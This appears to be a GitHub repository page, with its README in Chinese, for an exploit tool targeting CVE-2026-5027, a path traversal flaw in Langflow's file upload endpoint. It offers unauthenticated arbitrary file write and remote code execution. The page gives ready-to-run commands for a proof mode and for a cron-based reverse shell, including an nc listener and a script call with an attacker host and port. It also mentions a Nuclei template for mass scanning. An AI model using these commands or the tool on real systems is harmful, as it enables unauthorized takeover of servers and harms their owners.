0xBlackash/CVE-2026-5027

GitHub: 0xBlackash/CVE-2026-5027

针对 Langflow 平台文件上传接口路径遍历漏洞的利用工具,实现从未认证访问到远程代码执行的完整攻击链。

Stars: 0 | Forks: 0

# 🔥 CVE-2026-5027 - Langflow 路径遍历 Cybersecurity vulnerability_ path traversal exploit **任意文件写入导致 RCE** *通过文件上传实现未认证远程代码执行* CVE CVSS Exploit
## 📌 概述 **Langflow** 的文件上传端点 (`POST /api/v2/files`) 存在一个严重的 **路径遍历** 漏洞。 攻击者可以发送包含 `../` 序列的恶意文件名,从而在服务器文件系统的任意位置 **写入任意文件**。 这很容易导致 **完全的远程代码执行 (RCE)** —— 例如通过投放 webshell 或注入到 crontab 中。 ## 🛠️ 功能特性 - ✅ 未认证利用(默认自动登录配置) - ✅ 简单的概念验证(将测试文件写入 `/tmp`) - ✅ 通过 cron 实现完整的反向 Shell (Linux) - ✅ 包含 Nuclei 模板用于批量扫描 - ✅ 易于自定义遍历深度 ## 🚀 快速开始 ### 1. 概念验证 (安全测试) ``` python3 CVE-2026-5027.py -t http://target:7860/ --proof ``` **如果存在漏洞,预期输出:** ``` [+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt ``` ### 2. 完整反向 Shell ``` # 启动 listener nc -lvnp 4444 # 运行 exploit python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444 ``` ## 📁 仓库内容 | 文件 | 描述 | |----------------------------|------------------------------------------| | `CVE-2026-5027.py` | 主要 Python 利用脚本 (PoC + RCE) | | `CVE-2026-5027.yaml` | 用于扫描的 Nuclei 模板 | | `README.md` | 本文件 | ## 🎯 使用示例 cve-2026-5027 **验证模式** ``` python3 CVE-2026-5027.py -t http://target.com/ --proof ``` **反向 Shell 模式** ``` python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444 ``` ## ⚠️ 免责声明 本仓库仅用于 **教育和授权的安全测试目的**。 请负责任地使用,并仅在您拥有明确测试权限的系统上使用。
**用 ❤️ 制作,献给红队社区**
标签:Attack Web Applications, CISA项目, CVE-2026-5027, Langflow, Nuclei模板, PoC, Python, RCE, Web安全, 任意文件写入, 反向Shell, 文件上传漏洞, 无后门, 暴力破解, 未授权访问, 漏洞利用脚本, 漏洞复现, 目录穿越, 编程工具, 网络信息收集, 网络安全, 蓝队分析, 路径遍历, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞